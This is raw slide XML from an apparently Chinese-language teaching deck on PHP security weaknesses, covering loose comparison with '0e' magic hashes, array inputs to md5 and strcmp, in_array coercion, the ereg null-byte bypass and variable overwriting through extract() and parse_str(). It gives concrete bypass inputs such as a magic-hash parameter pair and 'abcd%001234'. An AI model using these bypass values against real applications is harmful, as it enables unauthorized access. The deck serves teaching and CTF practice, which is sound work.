              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEAC13B9-537C-A448-95DB-2E64E7172671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="4389120"/>
            <a:ext cx="8199120" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“0e”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加纯数字的字符串均互相弱等于</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即提交</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a= s878926199a&amp;b= s155964671a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即可</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11424141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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数</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1784"/>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类型转换</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{623B7EC9-6764-644A-83A7-743160D311B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1341120" y="1828800"/>
            <a:ext cx="11292840" cy="3890424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0"/>
              <a:t>md5([‘a’])===md5([‘b‘])</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对数组</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>会返回</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0"/>
              <a:t>strcmp([],‘a’)===NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP&gt;5.3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>版本数组和字符串比较返回</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>in_array(‘abc’, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0"/>
              <a:t>[0]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0"/>
              <a:t>===true</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘abc’</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>会被强制类型转换</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>is_numeric(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0"/>
              <a:t>’0e1’)===true</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>科学计数法</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>in_array(‘abc’,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0"/>
              <a:t>[0,1,2]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0"/>
              <a:t>===true</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>比较时会使用弱等于（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’abc’==0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30603776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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数</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1784"/>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正则表达式（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ereg/eregi</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78780A51-7B44-5A43-8058-BB34C4345856}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1950780"/>
            <a:ext cx="8976360" cy="3754874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 字符串对比解析，当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ereg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后面的字符串不会不会被解析。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这里 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a=abcd%001234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以绕过</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果传入数组，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ereg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2000" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{072A0191-A987-5F48-A172-2FE5E0A12474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="19552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295399" y="3218180"/>
            <a:ext cx="9042565" cy="1856740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327340105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变量覆盖</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2063835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>extract() </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数从数组中把变量导入到当前的符号表中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对于数组中的每个元素，键名用于变量名，键值用于变量值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如传入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>auth=1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>则会打印出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>private!"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05AD3B02-8E85-184B-BE42-4151503E9E3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2354" r="16219"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="2587816"/>
            <a:ext cx="9860376" cy="3843464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65895566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变量覆盖</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1809919"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>parse_str() </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的作用是解析字符串，并注册成变量</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>与 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>parse_str() </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>类似的函数还有 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mb_parse_str()</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>parse_str() </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将字符串解析成多个变量， 如果参数 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>str </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传递入的查询字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
